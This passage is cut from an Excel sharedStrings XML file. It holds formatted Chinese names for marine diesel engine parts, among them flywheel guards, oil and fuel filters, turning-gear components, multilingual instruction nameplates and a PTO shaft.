        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平侧水清洗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水清洗阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器后排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖上法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护下法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节防护罩</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>HOLSET</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴节</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮边缘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮防护罩总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮防护罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮防护罩凸轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮附件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮指示器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>托架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部结构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条总成</t>
    </r>
  </si>
  <si>
    <r>
      <t>1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮防护附件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿形</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>行星齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰连接的轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带齿的轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蜗轮毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离叉支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机底板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>微动开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壁上插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带降压阀的空气起动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>污垢分离器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度剖面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气起动电动机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车杆支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮电动机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>死点指示器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重燃油滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船用柴油滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油滤器盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮辋，润滑油滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大齿轮，润滑油滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支架，滑油滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不等边角钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">1    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不等边角钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">2    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤网</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油控制阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带锁环的导块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>关节臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备份控制单元电路板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压差阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>丹麦语说明铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>英语说明铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法语说明铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>西班牙语说明铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>葡萄牙语说明铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>俄语说明铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>波兰语说明铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>意大利语说明铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>德语说明铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明铭牌毛坯</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶离合器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水洗罐铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警开关</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油滤器仪表板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泵端盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泵壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功率输出</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">PTO   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>埋头螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功率输出</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力控制器壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端接线箱总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端接线箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端接线箱返工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
